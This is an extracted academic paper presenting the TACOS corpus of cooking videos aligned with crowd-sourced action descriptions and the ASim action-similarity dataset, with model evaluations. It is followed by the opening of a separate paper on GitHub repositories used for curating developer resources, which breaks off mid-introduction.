alternative approach to incorpo- rating visual information directly: they use so-called feature norms, which consist of human associations for many given words, as a proxy for general percep- tual information. Because this model is trained and evaluated on those feature norms, it is not directly comparable to our approach. The Restaurant Game by Orkin and Roy (2009) grounds written chat dialogues in actions carried out in a computer game. While this work is outstanding from the social learning perspective, the actions that ground the dialogues are clicks on a screen rather than real-world actions. The dataset has successfully been used to model determiner meaning (Reckman et al., 2011) in the context of the Restaurant Game, 26 but it is unclear how this approach could scale up to content words and other domains. 3 The TACOS Corpus We build our corpus on top of the “MPII Cook- ing Composite Activities” video corpus (Rohrbach et al., 2012b, MPII Composites), which contains videos of different activities in the cooking domain, e.g., preparing carrots or separating eggs. We ex- tend the existing corpus with multiple textual de- scriptions collected by crowd-sourcing via Amazon Mechanical Turk1 (MTurk). To facilitate the align- ment of sentences describing activities with their proper video segments, we also obtained approxi- mate timestamps, as described in Sec. 3.2. MPII Composites comes with timed gold- standard annotation of low-level activities and par- ticipating objects (e.g. OPEN [HAND,DRAWER] or TAKE OUT [HAND,KNIFE,DRAWER]). By adding textual descriptions (e.g., The person takes a knife from the drawer) and aligning them on the sentence level with videos and low-level annotations, we pro- vide a rich multimodal resource (cf. Fig. 2), the “Saarbrücken Corpus of Textually Annotated Cook- ing Scenes” (TACOS). In particular, the TACOS cor- pus provides: • A collection of coherent textual descrip- tions for video recordings of activities of medium complexity, as as a basis for empiri- cal discourse-related research, e.g., the selec- tion and granularity of action descriptions in context • A high-quality alignment of sentences with video segments, supporting the grounding of action descriptions in visual information • Collections of paraphrases describing the same scene, which result as a by-product from the text-video alignment and can be useful for text generation from videos (among other things) • The alignment of textual activity descriptions with sequences of low-level activities, which may be used to study the decomposition of ac- tion verbs into basic activity predicates 1mturk.com We expect that our corpus will encourage and en- able future work on various topics in natural lan- guage and video processing. In this paper, we will make use of the second aspect only, demonstrating the usefulness of the corpus for the grounding task. After a more detailed description of the basic video corpus and its annotation (Sec. 3.1) we de- scribe the collection of textual descriptions with MTurk (Sec. 3.2), and finally show the assembly and some benchmarks of the final corpus (Sec. 3.3). 3.1 The video corpus MPII Composites contains 212 high resolution video recordings of 1-23 minutes length (4.5 min. on av- erage). 41 basic cooking tasks such as cutting a cu- cumber were recorded, each between 4 and 8 times. The selection of cooking tasks is based on those pro- posed at “Jamie’s Home Cooking Skills”.2 The cor- pus is recorded in a kitchen environment with a total of 22 subjects. Each video depicts a single task exe- cuted by an individual subject. The dataset contains expert annotations of low- level activity tags. Annotations are provided for seg- ments containing a semantically meaningful cook- ing related movement pattern. The action must go beyond single body part movements (such as move arm up) and must have the goal of changing the state or location of an object. 60 different activity labels are used for annotation (e.g. PEEL, STIR, TRASH). Each low-level activity tag consists of an activity label (PEEL), a set of associated objects (CARROT, DRAWER,...), and the associated timeframe (start- ing and ending points of the activity). Associated objects are the participants of an activity, namely tools (e.g. KNIFE), patient (CARROT) and location (CUTTING-BOARD). We provide the coarse-grained role information for patient, location and tool in the corpus data, but we did not use this information in our experiments. The dataset contains a total of 8818 annotated segments, on average 42 per video. 3.2 Collecting textual video descriptions We collected textual descriptions for a subset of the videos in MPII Composites, restricting collection to tasks that involve manipulation of cooking ingredi- ents. We also excluded tasks with fewer than four 2www.jamieshomecookingskills.com 27 video recordings in the corpus, leaving 26 tasks to be described. We randomly selected five videos from each task, except the three tasks for which only four videos are available. This resulted in a total of 127 videos. For each video, we collected 20 different textual descriptions, leading to 2540 annotation as- signments. We published these assignments (HITs) on MTurk, using an adapted version3 of the annota- tion tool Vatic (Vondrick et al., 2012). In each assignment, the subject saw one video specified with the task title (e.g. How to prepare an onion), and then was asked to enter at least five and at most 15 complete English sentences to describe the events in the video. The annotation instructions contained example annotations from a kitchen task not contained in our actual dataset. Annotators were encouraged to watch each video several times, skipping backward and forward as they wished. They were also asked to take notes while watching, and to sketch the annotation before entering it. Once familiarized with the video, sub- jects did the final annotation by watching the entire video from beginning to end, without the possibil- ity of further non-sequential viewing. Subjects were asked to enter each sentence as soon as the action de- scribed by the sentence was completed. The video playback paused automatically at the beginning of the sentence input. We recorded pause onset for each sentence annotation as an approximate ending timestamp of the described action. The annotators resumed the video manually. The tasks required a HIT approval rate of 75% and were open only to workers in the US, in order to increase the general language quality of the En- glish annotations. Each task paid 1.20 USD. Before paying we randomly inspected the annotations and manually checked for quality. The total costs of col- lecting the annotations amounted to 3,353 USD. The data was obtained within a time frame of 3.5 weeks. 3.3 Putting the TACOS corpus together Our corpus is a combination of the MTurk data and MPII Composites, created by filtering out inappro- priate material and computing a high-quality align- ment of sentences and video segments. The align- ment is done by matching the approximate times- 3github.com/marcovzla/vatic/tree/bolt l1 l2 l3 l4 s1 l5 s3 s2 s1 s3 s2 el em en ta ry ti m ef ra m es sentences l1 l2 l3 l4 l5 Figure 1: Aligning action descriptions with the video. tamps of the MTurk data to the accurate timestamps in MPII Composites. We discarded text instances if people did not time the sentences properly, taking the association of sev- eral (or even all) sentences to a single timestamp as an indicator. Whenever we found a timestamp asso- ciated with two or more sentences, we discarded the whole instance. Overall, we had to filter out 13% of the text instances, which left us with 2206 textual video descriptions. For the alignment of sentence annotations and video segments, we assign a precise timeframe to each sentence in the following way: We take the timeframes given by the low-level annotation in MPII Composites as a gold standard micro-event segmentation of the video, because they mark all distinct frames that contain activities of interest. We call them elementary frames. The sequence of el- ementary frames is not necessarily continuous, be- cause idle time is not annotated. The MTurk sentences have end points that con- stitute a coarse-grained, noisy video segmentation, assuming that each sentence spans the time between the end of the previous sentence and its own end- ing point. We refine those noisy timeframes to gold frames as shown in Fig. 1: Each elementary frame (l1-l5) is mapped to a sentence (s1-s3) if its noisy timeframe covers at least half of the elementary frame. We define the final gold sentence frame then as the timespan between the starting point of the first and the ending point of the last elementary frame. The alignment of descriptions with low-level ac- tivities results in a table as given in Fig. 3. Columns contain the textual descriptions of the videos; rows 28 Top 10 Verbs cut, take, get, put, wash, place, rinse, remove, *pan, peel Top 10 Activities move, take out, cut, wash, take apart, add, shake, screw, put in, peel Figure 4: 10 most frequent verbs and low-level actions in the TACOS corpus. pan is probably often mis-tagged. correspond to low-level actions, and each sentence is aligned with the last of its associated low-level ac- tions. As a side effect, we also obtain multiple para- phrases for each sentence, by considering all sen- tences with the same associated time frame as equiv- alent realizations of the same action. The corpus contains 17,334 action descrip- tions (tokens), realizing 11,796 different sentences (types). It consists of 146,771 words (tokens), 75,210 of which are content word instances (i.e. nouns, verbs and adjectives). The verb vocabulary comprises 28,292 verb tokens, realizing 435 lem- mas. Since verbs occurring in the corpus typically describe actions, we can note that the linguistic vari- ance for the 58 different low-level activities is quite large. Fig. 4 gives an impression of the action re- alizations in the corpus, listing the most frequent verbs from the textual data, and the most frequent low-level activities. On average, each description covers 2.7 low-level activities, which indicates a clear difference in gran- ularity. 38% of the descriptions correspond to ex- actly one low-level activity, about a quarter (23%) covers two of them; 16% have 5 or more low-level elements, 2% more than 10. The corpus shows how humans vary the granularity of their descriptions, measured in time or number of low-level activities, and it shows how they vary the linguistic realization of the same action. For example, Fig. 3 contains dice and chop into small pieces as alternative realizations of the low-level activity sequence SLICE - SCRATCH OFF - SLICE. The descriptions are of varying length (9 words on average), reaching from two-word phrases to de- tailed descriptions of 65 words. Most sentences are short, consisting of a reference to the person in the video, a participant and an action verb (The person rinses the carrot, He cuts off the two edges). People often specified an instrument (from the faucet), or the resulting state of the action (chop the carrots in small pieces). Occasionally, we find more complex constructions (support verbs, coordinations). As Fig. 3 indicates, the timestamp-based align- ment is pretty accurate; occasional errors occur like He starts chopping the carrot... in NL Sequence 3. The data contains some typos and ungrammatical sentences (He washed carrot), but for our own ex- periments, the small number of such errors did not lead to any processing problems. 4 The Action Similarity Dataset In this section, we present a gold standard dataset, as a basis for the evaluation of visually grounded models of action similarity. We call it the “Action Similarity Dataset” (ASim) in analogy to the Usage Similarity dataset (USim) of Erk et al. (2009) and Erk et al. (2012). Similarly to USim, ASim con- tains a collection of sentence pairs with numerical similarity scores assigned by human annotators. We asked the annotators to focus on the similarity of the activities described rather than on assessing seman- tic similarity in general. We use sentences from the TACOS corpus and record their timestamps. Thus each sentence comes with the video segment which it describes (these were not shown to the annotators). 4.1 Selecting action description pairs Random selection of annotated sentences from the corpus would lead to a large majority of pairs which are completely dissimilar, or difficult to grade (e.g., He opens the drawer – The person cuts off the ends of the carrot). We constrained the selection pro- cess in two ways: First, we consider only sentences describing activities of manipulating an ingredient. The low-level annotation of the video corpus helps us identify candidate descriptions. We exclude rare and special activities, ending up with CUT, SLICE, CHOP, PEEL, TAKE APART, and WASH, which oc- cur reasonably frequently, with a wide distribution over different scenarios. We restrict the candidate set to those sentences whose timespan includes one of these activities. This results in a conceptually more focussed repertoire of descriptions, and at the same time admits full linguistic variation (wash an apple under the faucet – rinse an apple, slice the cucumber – cut the cucumber into slices). 29 896 -1137 wash [hand,carrot] 1145 -1212 shake [hand,carrot] 1330 -1388 close [hand,drawer] 1431 -1647 take out [hand,knife,drawer] 1647 -1669 move [hand,cutting board,counter] 1673 -1705 move [hand,carrot,bowl,cutting board] 1736 -1818 cut [knife,carrot,cutting board] 1919 -3395 slice [knife,carrot,cutting board] > 890: The man takes out a cutting board. > 1300: He washes a carrot. > 1500: He takes out a knife. > 4000: He slices the carrot. Videos of basic kitchen tasks Low level annotations with timestamps, actions and objects Natural language descriptions with ending times of the actions manual low-level annotation Mechanical Turk data collection timestamp-based alignment Figure 2: Corpus Overview Sample frame Start End Action Participants NL Sequence 1 NL Sequence 2 NL Sequence 3 743 911 wash hand, carrot He washed carrot The person rinses the carrot. He rinses the carrot from the faucet. 982 1090 cut knife, carrot, cutting board He cut off ends of carrots The person cuts off the ends of the carrot. He cuts off the two edges. 1164 1257 open hand, drawer 1679 1718 close hand, drawer He searches for some- thing in the drawer, failed attempt, he throws away the edges in trash. 1746 1799 trash hand, carrot The person searches for the trash can, then throws the ends of the carrot away. 1854 2011 wash hand, carrot He rinses the carrot again. 2011 2045 shake hand, carrot He washed carrot The person rinses the carrot again. He starts chopping the carrot in small pieces. 2083 2924 slice knife, carrot, cutting board 2924 2959 scratch off hand, carrot, knife, cutting board 3000 3696 slice knife, carrot, cutting board He diced carrots He finished chopping the carrots in small pieces. Figure 3: Excerpt from the corpus for a video on PREPARING A CARROT. Example frames, low-level annotation (Action and Participants) is shown along with three of the MTurk sequences (NL Sequence 1-3). 30 Second, we required the pairs to share some lexi- cal material, either the head verb or the manipulated ingredient (or both).4 More precisely, we composed the ASim dataset from three different subsets: Different activity, same object: This subset con- tains pairs describing different types of actions car- ried out on the same type of object (e.g. The man washes the carrot. – She dices the carrot.). Its fo- cus is on the central task of modeling the semantic relation between actions (rather than the objects in- volved in the activity), since the object head nouns in the descriptions are the same, and the respective video segments show the same type of object. Same activity, same object: Description pairs of this subset will in many cases, but not always, agree in their head verbs. The dataset is useful for explor- ing the degree to which action descriptions are un- derspecified with respect to the precise manner of their practical realization. For example, peeling an onion will mostly be done in a rather uniform way, while cut applied to carrot can mean that the carrot is chopped up, or sliced, or cut in halves. Same activity & verb, different object: Descrip- tion pairs in this subset share head verb and low- level activity, but have different objects (e.g. The man washes the carrot. – A girl washes an apple un- der the faucet.). This dataset enables the exploration of the objects’ meaning contribution to the complete action, established by the variation of equivalent ac- tions that are done to different objects. We assembled 900 action description pairs for anno- tation: 480 pairs share the object; 240 of which have different activities, and the other 240 pairs share the same activity. We included paraphrases describing the same video segment, but we excluded pairs of identical sentences. 420 additional pairs share their head verb, but have different objects. 4.2 Manual annotation Three native speakers of English were asked to judge the similarity of the action pairs with respect to how 4We refer to the latter with the term object; we don’t require the ingredient term to be the actual grammatical object in the action descriptions, we rather use “object” in its semantic role sense as the entity affected by an action. Part of Gold Standard Sim σ ρ DIFF. ACTIVITY, SAME OBJECT 2.20 1.07 0.73 SAME ACTIVITY, SAME OBJECT 4.19 1.04 0.73 ALL WITH SAME OBJECT 3.20 1.44 0.84 SAME VERB, DIFF. OBJECT 3.34 0.69 0.43 COMPLETE DATASET 3.27 1.15 0.73 Figure 5: Average similarity ratings (Sim), their standard deviation (σ)) and annotator agreement (ρ) for ASim. they are carried out, rating each sentence pair with a score from 1 (not similar at all) to 5 (the same or nearly the same). They did not see the respective videos, but we noted the relevant kitchen task (i.e. which vegetable was prepared). We asked the an- notators explicitly to ignore the actor of the action (e.g. whether it is a man or a woman) and score the similarities of the underlying actions rather than their verbalizations. Each subject rated all 900 pairs, which were shown to them in completely random or- der, with a different order for each subject. We compute inter-annotator agreement (and the forthcoming evaluation scores) using Spearman’s rank correlation coefficient (ρ), a non-parametric test which is widely used for similar evaluation tasks (Mitchell and Lapata, 2008; Bruni et al., 2011; Erk and McCarthy, 2009). Spearman’s ρ evaluates how the samples are ranked relative to each other rather than the numerical distance between the rankings. Fig. 5 shows the average similarity ratings in the different settings and the inter-annotator agreement. The average inter-rater agreement was ρ = 0.73 (av- eraged over pairwise rater agreements), with pair- wise results of ρ = 0.77, 0.72, and 0.69, respec- tively, which are all highly significant at p < 0.001. As expected, pairs with the same activity and ob- ject are rated very similar (4.19) on average, while the similarity of different activities on the same ob- ject is the lowest (2.2). For both subsets, inter-rater agreement is high (ρ = 0.73), and even higher for both SAME OBJECT subsets together (0.84). Pairs with identical head verbs and different ob- jects have a small standard deviation, at 0.69. The inter-annotator agreement on this set is much lower than for pairs from the SAME OBJECT set. This indi- cates that similarity assessment for different variants of the same activity is a hard task even for humans. 31 5 Models of Action Similarity In the following, we demonstrate that visual infor- mation contained in videos of the kind provided by the TACOS corpus (Sec. 3) substantially contributes to the semantic modeling of action-denoting expres- sions. In Sec. 6, we evaluate several methods for predicting action similarity on the task provided by the ASim dataset. In this section, we describe the models considered in the evaluation. We use two different models based on visual information, and in addition two text based models. We will also explore the effect of combining linguistic and visual infor- mation and investigate which mode is most suitable for which kinds of similarity. 5.1 Text-based models We use two different models of textual similarity to predict action similarity: a simple word-overlap measure (Jaccard coefficient) and a state-of-the-art model based on “contextualized” vector representa- tions of word meaning (Thater et al., 2011). Jaccard coefficient. The Jaccard coefficient gives the ratio between the number of (distinct) words common to two input sentences and the total num- ber of (distinct) words in the two sentences. Such simple surface-oriented measures of textual similar- ity are often used as baselines in related tasks such as recognizing textual entailment (Dagan et al., 2005) and are known to deliver relatively strong results. Vector model. We use the vector model of Thater et al. (2011), which “contextualizes” vector repre- sentations for individual words based on the particu- lar sentence context in which the target word occurs. The basic intuition behind this approach is that the words in the syntactic context of the target word in a given input sentence can be used to refine or disam- biguate its vector. Intuitively, this allows us to dis- criminate between different actions that a verb can refer to, based on the different objects of the action. We first experimented with a version of this vec- tor model which predicts action similarity scores of two input sentences by computing the cosine simi- larity of the contextualized vectors of the verbs in the two sentences only. We achieved better performance with a variant of this model which computes vectors for the two sentences by summing over the contex- tualized vectors of all constituent content words. In the experiments reported below, we only use the second variant. We use the same experimental setup as Thater et al. (2011), as well as the parameter settings that are reported to work best in that paper. 5.2 Video-based models We distinguish two approaches to compute the sim- ilarity between two video segments. In the first, un- supervised approach we extract a video descriptor and compute similarities between these raw features (Wang et al., 2011). The second approach builds upon the first by additionally learning higher level attribute classifiers (Rohrbach et al., 2012b) on a held out training set. The similarity between two segments is then computed between the classifier re- sponses. In the following we detail both approaches: Raw visual features. We use the state-of-the-art video descriptor Dense Trajectories (Wang et al., 2011) which extracts visual video features, namely histograms of oriented gradients, flow, and motion boundary histograms, around densely sampled and tracked points. This approach is especially suited for this data as it ignores non-moving parts in the video: we are interested in activities and manipulation of objects, and this type of feature implicitly uses only infor- mation in relevant image locations. For our setting this feature representation has been shown to be su- perior to human pose-based approaches (Rohrbach et al., 2012a). Using a bag-of-words representation we encode the features using a 16,000 dimensional codebook. Features and codebook are provided with the publicly available video dataset. We compute the similarity between two encoded features by computing the intersection of the two (normalized) histograms. Visual classifiers. Visual raw features tend to have several dimensions in the feature space which pro- vide unreliable, noisy values and thus degrade the strength of the similarity measure. Intermediate level attribute classifiers can learn which feature di- mensions are distinctive and thus significantly im- prove performance over raw features. Rohrbach et al. (2012b) showed that using such an attribute clas- sifier representation can significantly improve per- 32 MODEL SAME OBJECT SAME VERB OVERALL T E X T JACCARD 0.28 0.25 0.25 TEXTUAL VECTORS 0.30 0.25 0.27 TEXT COMBINED 0.39 0.35 0.36 V ID E O VISUAL RAW VECTORS 0.53 -0.08 0.35 VISUAL CLASSIFIER 0.60 0.03 0.44 VIDEO COMBINED 0.61 -0.04 0.44 M IX ALL UNSUPERVISED 0.58 0.32 0.48 ALL COMBINED 0.67 0.28 0.55 UPPER BOUND 0.84 0.43 0.73 Figure 6: Evaluation results in Spearman’s ρ. All values > 0.11 are significant at p < 0.001. formance for composite activity recognition. The relevant attributes are all activities and objects an- notated in the video data (cf. Section 3.1). For the experiments reported below we use the same setup as Rohrbach et al. (2012b) and use all videos in MPII Composites and MPII Cooking (Rohrbach et al., 2012a), excluding the 127 videos used during evaluation. The real-valued SVM-classifier output provides a confidence how likely a certain attribute appeared in a given video segment. This results in a 218-dimensional vector of classifier outputs for each video segment. To compute the similarity between two vectors we compute the cosine between them. 6 Evaluation We evaluate the different similarity models intro- duced in Sec. 5 by calculating their correlation with the gold-standard similarity annotations of ASim (cf. Sec. 4). For all correlations, we use Spear- man’s ρ as a measure. We consider the two textual measures (JACCARD and TEXTUAL VECTORS) and their combination, as well as the two visual mod- els (VISUAL RAW VECTORS and VISUAL CLAS- SIFIER) and their combination. We also combined textual and visual features, in two variants: The first includes all models (ALL COMBINED), the sec- ond only the unsupervised components, omitting the visual classifier (ALL UNSUPERVISED). To com- bine multiple similarity measures, we simply aver- age their normalized scores (using z-scores). Figure 6 shows the scores for all of these mea- sures on the complete ASim dataset (OVERALL), along with the two subparts, where description pairs share either the object (SAME OBJECT) or the head verb (SAME VERB). In addition to the model re- sults, the table also shows the average human inter- annotator agreement as UPPER BOUND. On the complete set, both visual and textual mea- sures have a highly significant correlation with the gold standard, whereas the combination of both clearly leads to the best performance (0.55). The results on the SAME OBJECT and SAME VERB sub- sets shed light on the division of labor between the two information sources. While the textual mea- sures show a comparable performance over the two subsets, there is a dramatic difference in the contri- bution of visual information: On the SAME OBJECT set, the visual models clearly outperform the textual ones, whereas the visual information has no positive effect on the SAME VERB set. This is clear evidence that the visual model does not capture the similar- ity of the participating objects but rather genuine ac- tion similarity, which the visual features (Wang et al., 2011) we employ were designed for. A direction for future work is to learn dedicated visual object de- tectors to recognize and capture similarities between objects more precisely. The numbers shown in Figure 7 support this hy- pothesis, showing the two groups in the SAME OB- JECT class: For sentence pairs that share the same activity, the textual models seem to be much more suitable than the visual ones. In general, visual mod- els perform better on actions with different activity types, textual models on closely related activities. 33 MODEL (SAME OBJECT) same action diff. action T E X T JACCARD 0.44 0.14 TEXT VECTORS 0.42 0.05 TEXT COMBINED 0.52 0.14 V ID E O VIS. RAW VECTORS 0.21 0.23 VIS. CLASSIFIER 0.21 0.45 VIDEO COMBINED 0.26 0.38 M IX ALL UNSUPERVISED 0.49 0.24 ALL COMBINED 0.48 0.41 UPPER BOUND 0.73 0.73 Figure 7: Results for sentences with the same object, with either the same or different low-level activity. Overall, the supervised classifier contributes a good part to the final results. However, the supervi- sion is not strictly necessary to arrive at a significant correlation; the raw visual features alone are suffi- cient for the main performance gain seen with the integration of visual information. 7 Conclusion We presented the TACOS corpus, which provides coherent textual descriptions for high-quality video recordings, plus accurate alignments of text and video on the sentence level. We expect the corpus to be beneficial for a variety of research activities in natural-language and visual processing. In this paper, we focused on the task of grounding the meaning of action verbs and phrases. We de- signed the ASim dataset as a gold standard and eval- uated several text- and video-based semantic simi- larity models on the dataset, both individually and in different combinations. We are the first to provide semantic models for action-describing expressions, which are based on information extracted from videos. Our experimen- tal results show that these models are of considerable quality, and that predictions based on a combination of visual and textual information even approach the upper bound given by the agreement of human an- notators. In this work we used existing similarity models that had been developed for different applications. We applied these models without any special train- ing or optimization for the current task, and we com- bined them in the most straightforward way. There is room for improvement by tuning the models to the task, or by using more sophisticated approaches to combine modality-specific information (Silberer and Lapata, 2012). We built our work on an existing corpus of high- quality video material, which is restricted to the cooking domain. As a consequence, the corpus cov- ers only a limited inventory of activity types and ac- tion verbs. Note, however, that our models are fully unsupervised (except the Visual Classifier model), and thus can be applied without modification to ar- bitrary domains and action verbs, given that they are about observable activities. Also, corpora contain- ing information comparable to the TACOS corpus but with wider coverage (and perhaps a bit noisier) can be obtained with a moderate amount of effort. One needs videos of reasonable quality and some sort of alignment with action descriptions. In some cases such alignments even come for free, e.g. via subti- tles, or descriptions of short video clips that depict just a single action. For future work, we will further investigate the compositionality of action-describing phrases. We also want to leverage the multimodal information provided by the TACOS corpus for the improvement of high-level video understanding, as well as for generation of natural-language text from videos. The TACOS corpus and all other data described in this paper (videos, low-level annotation, aligned tex- tual descriptions, the ASim-Dataset and visual fea- tures) are publicly available. 5 Acknowledgements We’d like to thank Asad Sayeed, Alexis Palmer and Prashant Rao for their help with the annotations. We’re indebted to Carl Vondrick and Marco An- tonio Valenzuela Escrcega for their extensive sup- port with the video annotation tool. Further we thank Alexis Palmer and in particular three anony- mous reviewers for their helpful comments on this paper. – This work was funded by the Cluster of Ex- cellence “Multimodal Computing and Interaction” of the German Excellence Initiative and the DFG project SCHI989/2-2. 5http://www.coli.uni-saarland.de/ projects/smile/page.php?id=tacos 34 References Luis von Ahn and Laura Dabbish. 2004. Labeling images with a computer game. In Proceedings of SIGCHI 2004. Elia Bruni, Giang Binh Tran, and Marco Baroni. 2011. Distributional semantics from text and images. In Pro- ceedings of GEMS 2011. David L. Chen and William B. Dolan. 2011. Collect- ing highly parallel data for paraphrase evaluation. In Proceedings of ACL 2011. Timothee Cour, Chris Jordan, Eleni Miltsakaki, and Ben Taskar. 2008. Movie/script: Alignment and parsing of video and text transcription. In Computer Vision – ECCV 2008, volume 5305 of Lecture Notes in Com- puter Science, pages 158–171. Springer Berlin Heidel- berg. Ido Dagan, Oren Glickman, and Bernardo Magnini. 2005. The PASCAL recognising textual entailment challenge. In Proceedings of MLCW 2005. Jesse Dodge, Amit Goyal, Xufeng Han, Alyssa Men- sch, Margaret Mitchell, Karl Stratos, Kota Yamaguchi, Yejin Choi, Hal Daumé III, Alexander C. Berg, and Tamara L. Berg. 2012. Detecting visual text. In HLT- NAACL, pages 762–772. Katrin Erk and Diana McCarthy. 2009. Graded word sense assignment. In Proceedings of EMNLP 2009. Katrin Erk, Diana McCarthy, and Nicholas Gaylord. 2009. Investigations on word senses and word usages. In Proceedings of ACL/AFNLP 2009. Katrin Erk, Diana McCarthy, and Nick Gaylord. 2012. Measuring word meaning in context. CL. Yansong Feng and Mirella Lapata. 2010. Visual infor- mation in semantic representation. In Proceedings of HLT-NAACL 2010. A. M. Glenberg. 2002. Grounding language in action. Psychonomic Bulletin & Review. Sonal Gupta and Raymond J. Mooney. 2010. Us- ing closed captions as supervision for video activ- ity recognition. In Proceedings of the Twenty-Fourth AAAI Conference on Artificial Intelligence (AAAI- 2010), pages 1083–1088, Atlanta, GA, July. Abhinav Gupta, Praveen Srinivasan, Jianbo Shi, and Larry S. Davis. 2009. Understanding videos, con- structing plots learning a visually grounded storyline model from annotated videos. In Proceedings of CVPR 2009. Steve R. Howell, Damian Jankowicz, and Suzanna Becker. 2005. A model of grounded language ac- quisition: Sensorimotor features improve lexical and grammatical learning. JML. S. Mathe, A. Fazly, S. Dickinson, and S. Stevenson. 2008. Learning the abstract motion semantics of verbs from captioned videos. pages 1–8. Jeff Mitchell and Mirella Lapata. 2008. Vector-based models of semantic composition. In Proceedings of ACL 2008. Tanvi S. Motwani and Raymond J. Mooney. 2012. Im- proving video activity recognition using object recog- nition and text mining. In Proceedings of the 20th European Conference on Artificial Intelligence (ECAI- 2012), pages 600–605, August. Jeff Orkin and Deb Roy. 2009. Automatic learning and generation of social behavior from collective human gameplay. In Proceedings of AAMAS 2009. Hilke Reckman, Jeff Orkin, and Deb Roy. 2011. Ex- tracting aspects of determiner meaning from dialogue in a virtual world environment. In Proceedings of CCS 2011, IWCS ’11. Marcus Rohrbach, Sikandar Amin, Mykhaylo Andriluka, and Bernt Schiele. 2012a. A database for fine grained activity detection of cooking activities. In Proceedings of CVPR 2012. Marcus Rohrbach, Michaela Regneri, Micha Andriluka, Sikandar Amin, Manfred Pinkal, and Bernt Schiele. 2012b. Script data for attribute-based recognition of composite activities. In Proceedings of ECCV 2012. Carina Silberer and Mirella Lapata. 2012. Grounded models of semantic representation. In Proceedings of EMNLP-CoNLL 2012. Mark Steyvers. 2010. Combining feature norms and text data with topic models. Acta Psychologica, 133(3):234 – 243. ¡ce:title¿Formal modeling of se- mantic concepts¡/ce:title¿. Stefan Thater, Hagen Fürstenau, and Manfred Pinkal. 2011. Word meaning in context: A simple and effec- tive vector model. In Proceedings of IJCNLP 2011. Peter D. Turney and Patrick Pantel. 2010. From fre- quency to meaning. vector space models for semantics. JAIR. E. Tzoukermann, J. Neumann, J. Kosecka, C. Fermuller, I. Perera, F. Ferraro, B. Sapp, R. Chaudhry, and G. Singh. 2011. Language models for semantic ex- traction and filtering in video action recognition. In AAAI Workshop on Language-Action Tools for Cogni- tive Artificial Agents. Carl Vondrick, Donald Patterson, and Deva Ramanan. 2012. Efficiently scaling up crowdsourced video an- notation. IJCV. Heng Wang, Alexander Kläser, Cordelia Schmid, and Cheng-Lin Liu. 2011. Action Recognition by Dense Trajectories. In Proceedings of CVPR 2011. 35 36 work_uu3zalov7vclddegvxyt2mvuka ---- Submitted 28 April 2017 Accepted 13 September 2017 Published 9 October 2017 Corresponding author Yu Wu, yuw132@psu.edu Academic editor Philipp Leitner Additional Information and Declarations can be found on page 18 DOI 10.7717/peerj-cs.134 Copyright 2017 Wu et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS The appropriation of GitHub for curation Yu Wu1, Na Wang2, Jessica Kropczynski3 and John M. Carroll1 1 Information Sciences and Technology, Pennsylvania State University, University Park, PA, United States of America 2 Samsung Research America, Mountain View, CA, United States of America 3 School of Information Technology, University of Cincinnati, Cincinnati, OH, United States of America ABSTRACT GitHub is a widely used online collaborative software development environment. In this paper, we describe curation projects as a new category of GitHub project that collects, evaluates, and preserves resources for software developers. We investigate: (1) what motivates software developers to curate resources; (2) why curation has occurred on GitHub; (3) how curated resources are used by software developers; and (4) how the GitHub platform could better support these practices. We conduct in- depth interviews with 16 software developers, each of whom hosts curation projects on GitHub. Our results suggest that the motivators that inspire software developers to curate resources on GitHub are similar to those that motivate them to participate in the development of open source projects. Convenient tools (e.g., Markdown syntax and Git version control system) and the opportunity to address professional needs of a large number of peers attract developers to engage in curation projects on GitHub. Benefits of curating on GitHub include learning opportunities, support for development work, and professional interaction. However, curation is limited by GitHub’s document structure, format, and a lack of key features, such as search. In light of this, we propose design possibilities to encourage and improve appropriations of GitHub for curation. Subjects Human-Computer Interaction, Software Engineering Keywords Curation, GitHub, Appropriation INTRODUCTION GitHub is a collaborative coding environment that employs social media features. It encourages software developers to perform collaborative software development by offering distributed version control and source code management services with social features (i.e., user profiles, comments, and broadcasting activity traces) (Dabbish et al., 2012). This web-based tool has attracted notable attention from both industry and academic communities. By the end of 2012, software developers hosted over 4.5 million repositories on GitHub (Marlow, Dabbish & Herbsleb, 2013). It has not only topped the list of preferred software hosting and collaboration services among developers (Doll, 2013), but also inspired a number of researchers to investigate how its features have supported software development practices (Dabbish et al., 2012; Marlow, Dabbish & Herbsleb, 2013; Singer et al., 2013). These prior studies have concluded that software developers make social inferences and collaborate with each other using GitHub social features (i.e., activity traces How to cite this article Wu et al. (2017), The appropriation of GitHub for curation. PeerJ Comput. Sci. 3:e134; DOI 10.7717/peerj- cs.134 https://peerj.com mailto:yuw132@psu.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.134 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.134 http://dx.doi.org/10.7717/peerj-cs.134 and follow function) (Dabbish et al., 2012; Marlow, Dabbish & Herbsleb, 2013; Singer et al., 2013; Wu et al., 2014). In addition to hosting and collaborating through the use of GitHub repositories, a new category of practice has recently emerged—software developers have begun appropriating GitHub repositories to create public resources lists (Wu et al., 2015). Such practices are recognized as curation—activities to select, evaluate, and organize resources for preservation and future use (Duh et al., 2012). In 2014 and 2015, GitHub repositories, such as awesome-python (https://github.com/vinta/awesome-python) and awesome-go (https://github.com/avelino/awesome-go), which curate resources about programming topics, gained vast popularity on GitHub. The number of curation repositories has steadily increased since then and many of them have remained among the most famous repositories on the entire platform (Wu et al., 2014). In light of the broad popularity of curation practices on GitHub, one might expect that motivations to participate in them and reasons that they are hosted as GitHub repositories rather than external websites are well-understood. However, research exploring the ways that social coding repository features have been appropriated for resource curation is sparse. In fact, the investigation of curation practices on social media has only recently begun and remains under-explored in general (Duh et al., 2012). The existing curation literature focuses on microblogging services (i.e., Twitter) (Duh et al., 2012; Dabbish et al., 2012; Greene et al., 2011) and media sharing service (i.e., Pinterest), leaving the nature of curation in software development practices untouched as an area of exploration. To address this gap in the literature, we conducted semi-structured interviews with 16 GitHub curators to better understand motivations to engage in this practice. In doing so, our study aims to investigate: (1) developers’ motivations that drive curation practices; (2) why GitHub is chosen for this purpose; (3) how curated resources are used; and (4) current limitations and potential future improvements for curation on GitHub. Our results suggest that curation practices on GitHub mostly grow out of software developers’ internal (altruism) and extrinsic motivations (personal needs and peer recognition). Software developers choose GitHub to perform curation practices mainly because this platform provides convenient tools and attracts vast groups of people with common interests. Software developers also benefit from curation in many aspects such as better software development support, efficient learning tools, and communication with the community. Further, curation represents a case that a collaborative working space is appropriated to an end-product for communicating high quality resources, suggesting GitHub repositories can be used for communication purposes to support the larger community of software developers. However, current curation practices are restricted 